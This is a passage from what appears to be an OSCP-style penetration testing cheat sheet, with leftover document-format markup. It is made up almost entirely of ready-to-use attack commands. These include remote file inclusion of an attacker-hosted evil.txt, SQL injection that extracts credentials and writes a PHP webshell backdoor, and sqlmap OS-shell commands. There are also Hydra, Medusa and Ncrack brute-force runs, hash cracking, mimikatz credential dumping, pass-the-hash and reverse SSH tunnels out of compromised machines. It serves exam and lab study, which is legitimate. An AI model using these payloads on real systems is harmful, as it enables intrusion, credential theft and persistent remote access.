text:c="4"/><text:line-break/><text:s text:c="9"/>`http://192.168.11.35/addguestbook.php?name=a&amp;comment=b&amp;LANG=http://192.168.10.5/evil.txt `<text:line-break/><text:s text:c="8"/><text:line-break/><text:s text:c="9"/>`&lt;?php echo shell\_exec("ipconfig");?&gt;`<text:line-break/><text:line-break/>-<text:s text:c="3"/>&lt;span id="_mgu7e3u7svak" class="anchor"&gt;&lt;span id="_Toc480741820" class="anchor"&gt;&lt;/span&gt;&lt;/span&gt;Database Vulnerabilities<text:line-break/><text:s text:c="4"/>----------------------------------------------------------------------------------------------------------------------<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Grab password hashes from a web application mysql database called “Users” - once you have the MySQL root username and<text:s text:c="8"/>password<text:s text:c="2"/><text:line-break/><text:s text:c="4"/><text:line-break/><text:s text:c="14"/>mysql -u root -p -h $ip<text:line-break/><text:s text:c="14"/>use "Users"<text:s text:c="2"/><text:line-break/><text:s text:c="14"/>show tables;<text:s text:c="2"/><text:line-break/><text:s text:c="14"/>select \* from users;<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Authentication Bypass<text:s text:c="2"/><text:line-break/><text:s text:c="4"/><text:line-break/><text:s text:c="14"/>name='wronguser' or 1=1;<text:s text:c="2"/><text:line-break/><text:s text:c="14"/>name='wronguser' or 1=1 LIMIT 1;<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Enumerating the Database<text:s text:c="2"/><text:line-break/><text:s text:c="4"/><text:line-break/><text:s text:c="8"/>`http://192.168.11.35/comment.php?id=738)'`<text:s text:c="2"/><text:line-break/><text:s text:c="8"/><text:line-break/><text:s text:c="8"/>Verbose error message?<text:s text:c="2"/><text:line-break/><text:s text:c="8"/><text:line-break/><text:s text:c="8"/>`http://$ip/comment.php?id=738 order by 1`<text:line-break/><text:s text:c="8"/><text:line-break/><text:s text:c="8"/>`http://$ip/comment.php?id=738 union all select 1,2,3,4,5,6<text:s text:c="2"/>`<text:line-break/><text:s text:c="8"/><text:line-break/><text:s text:c="8"/>Determine MySQL Version:<text:s text:c="2"/><text:line-break/><text:s text:c="8"/><text:line-break/><text:s text:c="8"/>`http://$ip/comment.php?id=738 union all select 1,2,3,4,@@version,6<text:s text:c="2"/>`<text:line-break/><text:s text:c="8"/><text:line-break/><text:s text:c="8"/>Current user being used for the database connection:<text:line-break/><text:s text:c="8"/><text:line-break/><text:s text:c="8"/>`http://$ip/comment.php?id=738 union all select 1,2,3,4,user(),6<text:s text:c="2"/>`<text:line-break/><text:s text:c="8"/><text:line-break/><text:s text:c="8"/>Enumerate database tables and column structures<text:s text:c="2"/><text:line-break/><text:s text:c="8"/><text:line-break/><text:s text:c="8"/>`http://$ip/comment.php?id=738 union all select 1,2,3,4,table_name,6 FROM information_schema.tables<text:s text:c="2"/>`<text:line-break/><text:s text:c="8"/><text:line-break/><text:s text:c="8"/>Target the users table in the database<text:s text:c="2"/><text:line-break/><text:s text:c="8"/><text:line-break/><text:s text:c="8"/>`http://$ip/comment.php?id=738 union all select 1,2,3,4,column_name,6 FROM information_schema.columns where<text:s text:c="8"/>table_name='users'<text:s text:c="2"/>`<text:line-break/><text:s text:c="8"/><text:line-break/><text:s text:c="8"/>Extract the name and password<text:s text:c="2"/><text:line-break/><text:s text:c="8"/><text:line-break/><text:s text:c="8"/>`http://$ip/comment.php?id=738 union select 1,2,3,4,concat(name,0x3a, password),6 FROM users ` <text:line-break/><text:s text:c="8"/><text:line-break/><text:s text:c="8"/>Create a backdoor<text:line-break/><text:s text:c="8"/><text:line-break/><text:s text:c="8"/>`http://$ip/comment.php?id=738 union all select 1,2,3,4,"&lt;?php echo shell_exec($_GET['cmd']);?&gt;",6 into OUTFILE<text:s text:c="8"/>'c:/xampp/htdocs/backdoor.php'`<text:line-break/><text:s text:c="8"/><text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>**SQLMap Examples**<text:line-break/><text:line-break/><text:s text:c="6"/>- Crawl the links<text:line-break/><text:s text:c="6"/><text:line-break/><text:s text:c="9"/>`sqlmap -u http://$ip --crawl=1`<text:line-break/><text:s text:c="9"/><text:line-break/><text:s text:c="9"/>`sqlmap -u http://meh.com --forms --batch --crawl=10 --cookie=jsessionid=54321 --level=5 --risk=3`<text:line-break/><text:s text:c="9"/><text:line-break/><text:s text:c="9"/><text:line-break/><text:s text:c="6"/>- SQLMap Search for databases against a suspected GET SQL Injection <text:line-break/><text:s text:c="6"/><text:line-break/><text:s text:c="8"/>`sqlmap –u http://$ip/blog/index.php?search –dbs`<text:line-break/><text:line-break/><text:s text:c="6"/>- SQLMap dump tables from database oscommerce at GET SQL injection<text:line-break/><text:s text:c="6"/><text:line-break/><text:s text:c="8"/>`sqlmap –u http://$ip/blog/index.php?search= –dbs –D oscommerce –tables –dumps `<text:line-break/><text:s text:c="6"/><text:line-break/><text:s text:c="6"/>- SQLMap GET Parameter command<text:s text:c="2"/><text:line-break/><text:s text:c="6"/><text:line-break/><text:s text:c="9"/>`sqlmap -u http://$ip/comment.php?id=738 --dbms=mysql --dump -threads=5<text:s text:c="2"/>`<text:line-break/><text:s text:c="10"/><text:line-break/><text:s text:c="6"/>- SQLMap Post Username parameter<text:line-break/><text:s text:c="6"/><text:line-break/><text:s text:c="10"/>`sqlmap -u http://$ip/login.php --method=POST --data="usermail=asc@dsd.com&amp;password=1231" -p "usermail" --risk=3 --level=5 --dbms=MySQL --dump-all`<text:line-break/><text:s text:c="11"/><text:line-break/><text:s text:c="6"/>- SQL Map OS Shell<text:line-break/><text:s text:c="12"/><text:line-break/><text:s text:c="10"/>`sqlmap -u http://$ip/comment.php?id=738 --dbms=mysql --osshell<text:s text:c="2"/>`<text:line-break/><text:s text:c="6"/><text:line-break/><text:s text:c="10"/>`sqlmap -u http://$ip/login.php --method=POST --data="usermail=asc@dsd.com&amp;password=1231" -p "usermail" --risk=3 --level=5 --dbms=MySQL --os-shell`<text:line-break/><text:s text:c="12"/><text:line-break/><text:s text:c="7"/>- Automated sqlmap scan<text:line-break/><text:s text:c="7"/><text:line-break/><text:s text:c="10"/>`sqlmap -u TARGET -p PARAM --data=POSTDATA --cookie=COOKIE --level=3 --current-user --current-db --passwords<text:s text:c="2"/>--file-read="/var/www/blah.php"`<text:line-break/><text:s text:c="13"/><text:line-break/><text:s text:c="8"/>- Targeted sqlmap scan<text:line-break/><text:s text:c="8"/><text:line-break/><text:s text:c="11"/>`sqlmap -u "http://meh.com/meh.php?id=1" --dbms=mysql --tech=U --random-agent --dump`<text:line-break/><text:s text:c="13"/><text:line-break/><text:s text:c="9"/>- Scan url for union + error based injection with mysql backend and use a random user agent + database dump<text:s text:c="2"/><text:line-break/><text:s text:c="9"/><text:line-break/><text:s text:c="12"/>`sqlmap -o -u http://$ip/index.php --forms --dbs<text:s text:c="2"/>`<text:line-break/><text:s text:c="15"/><text:line-break/><text:s text:c="12"/>`sqlmap -o -u "http://$ip/form/" --forms`<text:line-break/><text:s text:c="16"/><text:line-break/><text:s text:c="10"/>- Sqlmap check form for injection<text:s text:c="2"/><text:line-break/><text:s text:c="10"/><text:line-break/><text:s text:c="13"/>`sqlmap -o -u "http://$ip/vuln-form" --forms -D database-name -T users --dump`<text:line-break/><text:s text:c="17"/><text:line-break/><text:s text:c="11"/>- Enumerate databases<text:s text:c="2"/><text:line-break/><text:s text:c="11"/><text:line-break/><text:s text:c="14"/>`sqlmap --dbms=mysql -u "$URL" --dbs`<text:line-break/><text:s text:c="16"/><text:line-break/><text:s text:c="12"/>- Enumerate tables from a specific database<text:s text:c="2"/><text:line-break/><text:s text:c="18"/><text:line-break/><text:s text:c="14"/>`sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" --tables<text:s text:c="2"/>`<text:line-break/><text:s text:c="18"/><text:line-break/><text:s text:c="12"/>- Dump table data from a specific database and table<text:s text:c="2"/><text:line-break/><text:s text:c="12"/><text:line-break/><text:s text:c="15"/>`sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" -T "$TABLE" --dump `<text:line-break/><text:s text:c="19"/><text:line-break/><text:s text:c="12"/>- Specify parameter to exploit<text:s text:c="2"/><text:line-break/><text:s text:c="13"/><text:line-break/><text:s text:c="15"/>`sqlmap --dbms=mysql -u "http://www.example.com/param1=value1&amp;param2=value2" --dbs -p param2 `<text:line-break/><text:s text:c="20"/><text:line-break/><text:s text:c="12"/>- Specify parameter to exploit in 'nice' URIs (exploits param1)<text:line-break/><text:s text:c="13"/><text:line-break/><text:s text:c="16"/>`sqlmap --dbms=mysql -u "http://www.example.com/param1/value1*/param2/value2" --dbs `<text:line-break/><text:s text:c="21"/><text:line-break/><text:s text:c="12"/>- Get OS shell<text:s text:c="2"/><text:line-break/><text:s text:c="14"/><text:line-break/><text:s text:c="17"/>`sqlmap --dbms=mysql -u "$URL" --os-shell`<text:line-break/><text:s text:c="23"/><text:line-break/><text:s text:c="12"/>- Get SQL shell<text:s text:c="2"/><text:line-break/><text:s text:c="23"/><text:line-break/><text:s text:c="17"/>`sqlmap --dbms=mysql -u "$URL" --sql-shell`<text:line-break/><text:s text:c="24"/><text:line-break/><text:s text:c="13"/>- SQL query<text:s text:c="2"/><text:line-break/><text:s text:c="16"/><text:line-break/><text:s text:c="16"/>`sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" --sql-query "SELECT * FROM $TABLE;"` <text:line-break/><text:s text:c="25"/><text:line-break/><text:s text:c="13"/>- Use Tor Socks5 proxy<text:s text:c="2"/><text:line-break/><text:s text:c="17"/><text:line-break/><text:s text:c="16"/>`sqlmap --tor --tor-type=SOCKS5 --check-tor --dbms=mysql -u "$URL" --dbs`<text:line-break/><text:s text:c="7"/><text:line-break/><text:s text:c="7"/><text:line-break/>-<text:s text:c="3"/>**NoSQLMap Examples**<text:line-break/><text:s text:c="7"/>You may encounter NoSQL instances like MongoDB in your OSCP journies (`/cgi-bin/mongo/2.2.3/dbparse.py`).<text:s text:c="2"/>NoSQLMap can help you to automate NoSQLDatabase enumeration. <text:line-break/><text:s text:c="7"/><text:line-break/><text:s text:c="2"/>-<text:s text:c="3"/>NoSQLMap Installation <text:line-break/><text:s text:c="7"/><text:line-break/><text:s text:c="12"/>git clone https://github.com/codingo/NoSQLMap.git<text:line-break/><text:s text:c="12"/>cd NoSQLMap/<text:line-break/><text:s text:c="12"/>ls<text:line-break/><text:s text:c="12"/>pip install couchdb<text:line-break/><text:s text:c="12"/>pip install pbkdf2<text:line-break/><text:s text:c="12"/>pip install ipcalc<text:line-break/><text:s text:c="12"/>python nosqlmap.py --help <text:line-break/><text:line-break/>-<text:s text:c="3"/>Password Attacks<text:line-break/><text:s text:c="4"/>--------------------------------------------------------------------------------------------------------------<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>AES Decryption<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>http://aesencryption.net/<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Convert multiple webpages into a word list<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>for x in 'index' 'about' 'post' 'contact' ; do curl<text:line-break/><text:s text:c="8"/>http://$ip/$x.html | html2markdown | tr -s ' ' '\\n' &gt;&gt;<text:line-break/><text:s text:c="8"/>webapp.txt ; done<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Or convert html to word list dict<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>html2dic index.html.out | sort -u &gt; index-html.dict<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Default Usernames and Passwords<text:line-break/><text:line-break/><text:s text:c="8"/>-<text:s text:c="3"/>CIRT<text:s text:c="2"/><text:line-break/><text:s text:c="12"/>[*http://www.cirt.net/passwords*](http://www.cirt.net/passwords)<text:line-break/><text:line-break/><text:s text:c="8"/>-<text:s text:c="3"/>Government Security - Default Logins and Passwords for<text:line-break/><text:s text:c="12"/>Networked Devices<text:line-break/><text:line-break/><text:s text:c="8"/>-<text:s text:c="3"/>[*http://www.governmentsecurity.org/articles/DefaultLoginsandPasswordsforNetworkedDevices.php*](http://www.governmentsecurity.org/articles/DefaultLoginsandPasswordsforNetworkedDevices.php)<text:line-break/><text:line-break/><text:s text:c="8"/>-<text:s text:c="3"/>Virus.org<text:s text:c="2"/><text:line-break/><text:s text:c="12"/>[*http://www.virus.org/default-password/*](http://www.virus.org/default-password/)<text:line-break/><text:line-break/><text:s text:c="8"/>-<text:s text:c="3"/>Default Password<text:s text:c="2"/><text:line-break/><text:s text:c="12"/>[*http://www.defaultpassword.com/*](http://www.defaultpassword.com/)<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Brute Force<text:line-break/><text:line-break/><text:s text:c="8"/>-<text:s text:c="3"/>Nmap Brute forcing Scripts<text:s text:c="2"/><text:line-break/><text:s text:c="12"/>[*https://nmap.org/nsedoc/categories/brute.html*](https://nmap.org/nsedoc/categories/brute.html)<text:line-break/><text:line-break/><text:s text:c="8"/>-<text:s text:c="3"/>Nmap Generic auto detect brute force attack<text:s text:c="2"/><text:line-break/><text:s text:c="12"/>nmap --script brute -Pn &lt;target.com or ip&gt;<text:line-break/><text:s text:c="12"/>&lt;enter&gt;<text:line-break/><text:line-break/><text:s text:c="8"/>-<text:s text:c="3"/>MySQL nmap brute force attack<text:s text:c="2"/><text:line-break/><text:s text:c="12"/>nmap --script=mysql-brute $ip<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Dictionary Files<text:line-break/><text:line-break/><text:s text:c="8"/>-<text:s text:c="3"/>Word lists on Kali<text:s text:c="2"/><text:line-break/><text:s text:c="12"/>cd /usr/share/wordlists<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Key-space Brute Force<text:line-break/><text:line-break/><text:s text:c="8"/>-<text:s text:c="3"/>crunch 6 6 0123456789ABCDEF -o crunch1.txt<text:line-break/><text:line-break/><text:s text:c="8"/>-<text:s text:c="3"/>crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha<text:line-break/><text:line-break/><text:s text:c="8"/>-<text:s text:c="3"/>crunch 8 8 -t ,@@^^%%%<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Pwdump and Fgdump - Security Accounts Manager (SAM)<text:line-break/><text:line-break/><text:s text:c="8"/>-<text:s text:c="3"/>pwdump.exe - attempts to extract password hashes<text:line-break/><text:line-break/><text:s text:c="8"/>-<text:s text:c="3"/>fgdump.exe - attempts to kill local antiviruses before<text:line-break/><text:s text:c="12"/>attempting to dump the password hashes and<text:line-break/><text:s text:c="12"/>cached credentials.<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Windows Credential Editor (WCE)<text:line-break/><text:line-break/><text:s text:c="8"/>-<text:s text:c="3"/>allows one to perform several attacks to obtain clear text<text:line-break/><text:s text:c="12"/>passwords and hashes<text:line-break/><text:line-break/><text:s text:c="8"/>-<text:s text:c="3"/>wce -w<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Mimikatz<text:line-break/><text:line-break/><text:s text:c="8"/>-<text:s text:c="3"/>extract plaintexts passwords, hash, PIN code and kerberos<text:line-break/><text:s text:c="12"/>tickets from memory. mimikatz can also perform<text:line-break/><text:s text:c="12"/>pass-the-hash, pass-the-ticket or build Golden tickets<text:s text:c="2"/><text:line-break/><text:s text:c="12"/>[*https://github.com/gentilkiwi/mimikatz*](https://github.com/gentilkiwi/mimikatz)<text:line-break/><text:s text:c="12"/>From metasploit meterpreter (must have System level access):<text:line-break/><text:s text:c="12"/>`meterpreter&gt; load mimikatz<text:line-break/><text:s text:c="12"/>meterpreter&gt; help mimikatz<text:line-break/><text:s text:c="12"/>meterpreter&gt; msv<text:line-break/><text:s text:c="12"/>meterpreter&gt; kerberos<text:line-break/><text:s text:c="12"/>meterpreter&gt; mimikatz_command -f samdump::hashes<text:line-break/><text:s text:c="12"/>meterpreter&gt; mimikatz_command -f sekurlsa::searchPasswords`<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Password Profiling<text:line-break/><text:line-break/><text:s text:c="8"/>-<text:s text:c="3"/>cewl can generate a password list from a web page<text:s text:c="2"/><text:line-break/><text:s text:c="12"/>`cewl www.megacorpone.com -m 6 -w megacorp-cewl.txt`<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Password Mutating<text:line-break/><text:line-break/><text:s text:c="8"/>-<text:s text:c="3"/>John the ripper can mutate password lists<text:s text:c="2"/><text:line-break/><text:s text:c="12"/>nano /etc/john/john.conf<text:s text:c="2"/><text:line-break/><text:s text:c="12"/>`john --wordlist=megacorp-cewl.txt --rules --stdout &gt; mutated.txt`<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Medusa<text:line-break/><text:line-break/><text:s text:c="8"/>-<text:s text:c="3"/>Medusa, initiated against an htaccess protected web<text:line-break/><text:s text:c="12"/>directory<text:s text:c="2"/><text:line-break/><text:s text:c="12"/>`medusa -h $ip -u admin -P password-file.txt -M http -m DIR:/admin -T 10`<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Ncrack<text:line-break/><text:line-break/><text:s text:c="8"/>-<text:s text:c="3"/>ncrack (from the makers of nmap) can brute force RDP<text:s text:c="2"/><text:line-break/><text:s text:c="12"/>`ncrack -vv --user offsec -P password-file.txt rdp://$ip`<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Hydra<text:line-break/><text:line-break/><text:s text:c="8"/>-<text:s text:c="3"/>Hydra brute force against SNMP<text:s text:c="2"/><text:line-break/><text:s text:c="12"/>`hydra -P password-file.txt -v $ip snmp`<text:line-break/><text:line-break/><text:s text:c="8"/>-<text:s text:c="3"/>Hydra FTP known user and password list<text:s text:c="2"/><text:line-break/><text:s text:c="12"/>`hydra -t 1 -l admin -P /root/Desktop/password.lst -vV $ip ftp`<text:line-break/><text:line-break/><text:s text:c="8"/>-<text:s text:c="3"/>Hydra SSH using list of users and passwords<text:s text:c="2"/><text:line-break/><text:s text:c="12"/>`hydra -v -V -u -L users.txt -P passwords.txt -t 1 -u $ip ssh`<text:line-break/><text:line-break/><text:s text:c="8"/>-<text:s text:c="3"/>Hydra SSH using a known password and a username list<text:s text:c="2"/><text:line-break/><text:s text:c="12"/>`hydra -v -V -u -L users.txt -p "&lt;known password&gt;" -t 1 -u $ip ssh`<text:line-break/><text:line-break/><text:s text:c="8"/>-<text:s text:c="3"/>Hydra SSH Against Known username on port 22<text:line-break/><text:s text:c="12"/>`hydra $ip -s 22 ssh -l &lt;user&gt; -P big\_wordlist.txt`<text:line-break/><text:line-break/><text:s text:c="8"/>-<text:s text:c="3"/>Hydra POP3 Brute Force<text:s text:c="2"/><text:line-break/><text:s text:c="12"/>`hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f $ip pop3 -V`<text:line-break/><text:line-break/><text:s text:c="8"/>-<text:s text:c="3"/>Hydra SMTP Brute Force<text:s text:c="2"/><text:line-break/><text:s text:c="12"/>`hydra -P /usr/share/wordlistsnmap.lst $ip smtp -V`<text:line-break/><text:line-break/><text:s text:c="8"/>-<text:s text:c="3"/>Hydra attack http get 401 login with a dictionary<text:s text:c="2"/><text:line-break/><text:s text:c="12"/>`hydra -L ./webapp.txt -P ./webapp.txt $ip http-get /admin`<text:line-break/><text:s text:c="12"/><text:line-break/><text:s text:c="8"/>-<text:s text:c="3"/>Hydra attack Windows Remote Desktop with rockyou<text:line-break/><text:s text:c="12"/>`hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt rdp://$ip`<text:line-break/><text:s text:c="12"/><text:line-break/><text:s text:c="8"/>-<text:s text:c="3"/>Hydra brute force a Wordpress admin login<text:line-break/><text:s text:c="12"/>`hydra -l admin -P ./passwordlist.txt $ip -V http-form-post '/wp-login.php:log=^USER^&amp;pwd=^PASS^&amp;wp-submit=Log In&amp;testcookie=1:S=Location'`<text:line-break/><text:line-break/><text:s text:c="10"/><text:line-break/><text:line-break/>-<text:s text:c="3"/>&lt;span id="_bnmnt83v58wk" class="anchor"&gt;&lt;span id="_Toc480741822" class="anchor"&gt;&lt;/span&gt;&lt;/span&gt;Password Hash Attacks<text:line-break/><text:s text:c="4"/>-------------------------------------------------------------------------------------------------------------------<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Online Password Cracking<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>[*https://crackstation.net/*](https://crackstation.net/)<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Hashcat<text:line-break/><text:s text:c="3"/>Needed to install new drivers to get my GPU Cracking to work on the Kali linux VM and I also had to use the --force parameter.<text:line-break/>apt-get install libhwloc-dev ocl-icd-dev ocl-icd-opencl-dev<text:line-break/>and<text:line-break/>apt-get install pocl-opencl-icd<text:line-break/><text:line-break/><text:s text:c="3"/>Cracking Linux Hashes - /etc/shadow file<text:line-break/><text:s text:c="3"/>```<text:line-break/><text:s text:c="3"/>500 | md5crypt $1$, MD5(Unix)<text:s text:c="26"/>| Operating-Systems<text:line-break/><text:s text:c="3"/>3200 | bcrypt $2*$, Blowfish(Unix)<text:s text:c="22"/>| Operating-Systems<text:line-break/><text:s text:c="3"/>7400 | sha256crypt $5$, SHA256(Unix)<text:s text:c="20"/>| Operating-Systems<text:line-break/><text:s text:c="3"/>1800 | sha512crypt $6$, SHA512(Unix)<text:s text:c="20"/>| Operating-Systems<text:line-break/><text:s text:c="3"/>```<text:line-break/><text:s text:c="3"/>Cracking Windows Hashes<text:line-break/><text:s text:c="3"/>```<text:line-break/><text:s text:c="3"/>3000 | LM<text:s text:c="47"/>| Operating-Systems<text:line-break/><text:s text:c="3"/>1000 | NTLM<text:s text:c="45"/>| Operating-Systems<text:line-break/><text:s text:c="3"/>```<text:line-break/><text:s text:c="3"/>Cracking Common Application Hashes<text:line-break/><text:s text:c="3"/>```<text:line-break/><text:s text:c="4"/>900 | MD4<text:s text:c="46"/>| Raw Hash<text:line-break/><text:s text:c="6"/>0 | MD5<text:s text:c="46"/>| Raw Hash<text:line-break/><text:s text:c="3"/>5100 | Half MD5<text:s text:c="41"/>| Raw Hash<text:line-break/><text:s text:c="4"/>100 | SHA1<text:s text:c="45"/>| Raw Hash<text:line-break/><text:s text:c="2"/>10800 | SHA-384<text:s text:c="42"/>| Raw Hash<text:line-break/><text:s text:c="3"/>1400 | SHA-256<text:s text:c="42"/>| Raw Hash<text:line-break/><text:s text:c="3"/>1700 | SHA-512<text:s text:c="42"/>| Raw Hash<text:line-break/><text:s text:c="3"/>```<text:line-break/><text:s text:c="3"/><text:line-break/><text:s text:c="3"/>Create a .hash file with all the hashes you want to crack<text:line-break/><text:s text:c="3"/>puthasheshere.hash:<text:line-break/><text:s text:c="3"/>```<text:line-break/><text:s text:c="3"/>$1$O3JMY.Tw$AdLnLjQ/5jXF9.MTp3gHv/<text:line-break/><text:s text:c="3"/>```<text:line-break/><text:s text:c="3"/><text:line-break/><text:s text:c="3"/>Hashcat example cracking Linux md5crypt passwords $1$ using rockyou:<text:line-break/><text:s text:c="3"/><text:line-break/><text:s text:c="3"/>`hashcat --force -m 500 -a 0 -o found1.txt --remove puthasheshere.hash /usr/share/wordlists/rockyou.txt`<text:line-break/><text:s text:c="3"/><text:line-break/><text:s text:c="3"/>Wordpress sample hash: $P$B55D6LjfHDkINU5wF.v2BuuzO0/XPk/<text:line-break/><text:s text:c="3"/><text:line-break/><text:s text:c="3"/>Wordpress clear text: test<text:line-break/><text:s text:c="3"/><text:line-break/><text:s text:c="3"/>Hashcat example cracking Wordpress passwords using rockyou:<text:line-break/><text:s text:c="3"/><text:line-break/><text:s text:c="2"/>`hashcat --force -m 400 -a 0 -o found1.txt --remove wphash.hash /usr/share/wordlists/rockyou.txt`<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Sample Hashes<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>[*http://openwall.info/wiki/john/sample-hashes*](http://openwall.info/wiki/john/sample-hashes)<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Identify Hashes<text:s text:c="2"/><text:line-break/><text:s text:c="4"/><text:line-break/><text:s text:c="8"/>`hash-identifier`<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>To crack linux hashes you must first unshadow them:<text:s text:c="2"/><text:line-break/><text:s text:c="4"/><text:line-break/><text:s text:c="8"/>`unshadow passwd-file.txt shadow-file.txt<text:s text:c="2"/>`<text:line-break/><text:s text:c="8"/>`unshadow passwd-file.txt shadow-file.txt &gt; unshadowed.txt`<text:line-break/><text:line-break/>-<text:s text:c="3"/>John the Ripper - Password Hash Cracking<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>`john $ip.pwdump`<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>`john --wordlist=/usr/share/wordlists/rockyou.txt hashes`<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>`john --rules --wordlist=/usr/share/wordlists/rockyou.txt`<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>`john --rules --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt`<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>JTR forced descrypt cracking with wordlist<text:s text:c="2"/><text:line-break/><text:s text:c="4"/><text:line-break/><text:s text:c="8"/>`john --format=descrypt --wordlist<text:s text:c="2"/>/usr/share/wordlists/rockyou.txt hash.txt`<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>JTR forced descrypt brute force cracking<text:s text:c="2"/><text:line-break/><text:s text:c="4"/><text:line-break/><text:s text:c="8"/>`john --format=descrypt hash --show`<text:line-break/><text:line-break/>-<text:s text:c="3"/>Passing the Hash in Windows<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Use Metasploit to exploit one of the SMB servers in the labs.<text:line-break/><text:s text:c="8"/>Dump the password hashes and attempt a pass-the-hash attack<text:line-break/><text:s text:c="8"/>against another system:<text:s text:c="2"/><text:line-break/><text:s text:c="10"/><text:line-break/><text:s text:c="8"/>`export SMBHASH=aad3b435b51404eeaad3b435b51404ee:6F403D3166024568403A94C3A6561896 `<text:line-break/><text:s text:c="10"/><text:line-break/><text:s text:c="8"/>`pth-winexe -U administrator //$ip cmd`<text:line-break/><text:line-break/>&lt;span id="_6nmbgmpltwon" class="anchor"&gt;&lt;span id="_Toc480741823" class="anchor"&gt;&lt;/span&gt;&lt;/span&gt;Networking, Pivoting and Tunneling<text:line-break/>================================================================================================================================<text:line-break/><text:line-break/>-<text:s text:c="3"/>Port Forwarding - accept traffic on a given IP address and port and<text:line-break/><text:s text:c="4"/>redirect it to a different IP address and port<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>`apt-get install rinetd`<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>`cat /etc/rinetd.conf<text:s text:c="2"/>`<text:line-break/><text:s text:c="8"/>`\# bindadress bindport connectaddress connectport ` <text:line-break/><text:s text:c="8"/>`w.x.y.z 53 a.b.c.d 80`<text:line-break/><text:line-break/>-<text:s text:c="3"/>SSH Local Port Forwarding: supports bi-directional communication<text:line-break/><text:s text:c="4"/>channels<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>`ssh &lt;gateway&gt; -L &lt;local port to listen&gt;:&lt;remote<text:line-break/><text:s text:c="8"/>host&gt;:&lt;remote port&gt;`<text:line-break/><text:line-break/>-<text:s text:c="3"/>SSH Remote Port Forwarding: Suitable for popping a remote shell on<text:line-break/><text:s text:c="4"/>an internal non routable network<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>`ssh &lt;gateway&gt; -R &lt;remote port to bind&gt;:&lt;local<text:line-break/><text:s text:c="8"/>host&gt;:&lt;local port&gt;` <text:line-break/><text:line-break/>-<text:s text:c="3"/>SSH Dynamic Port Forwarding: create a SOCKS4 proxy on our local<text:line-break/><text:s text:c="4"/>attacking box to tunnel ALL incoming traffic to ANY host in the DMZ<text:line-break/><text:s text:c="4"/>network on ANY PORT<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>`ssh -D &lt;local proxy port&gt; -p &lt;remote port&gt;<text:line-break/><text:s text:c="8"/>&lt;target&gt;`<text:line-break/><text:line-break/>-<text:s text:c="3"/>Proxychains - Perform nmap scan within a DMZ from an external<text:line-break/><text:s text:c="4"/>computer<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Create reverse SSH tunnel from Popped machine on :2222<text:s text:c="2"/><text:line-break/><text:s text:c="8"/><text:line-break/><text:s text:c="8"/>`ssh -f -N -T -R22222:localhost:22 yourpublichost.example.com`<text:line-break/><text:s text:c="8"/>`ssh -f -N -R 2222:&lt;local host&gt;:22 root@&lt;remote host&gt;`<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Create a Dynamic application-level port forward on 8080 thru<text:line-break/><text:s text:c="8"/>2222<text:s text:c="2"/><text:line-break/><text:s text:c="8"/><text:line-break/><text:s text:c="8"/>`ssh -f -N -D &lt;local host&gt;:8080 -p 2222 hax0r@&lt;remote host&gt;`<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Leverage the SSH SOCKS server to perform Nmap scan on network<text:line-break/><text:s text:c="8"/>using proxy chains<text:s text:c="2"/><text:line-break/><text:s text:c="8"/><text:line-break/><text:s text:c="8"/>`proxychains nmap --top-ports=20 -sT -Pn 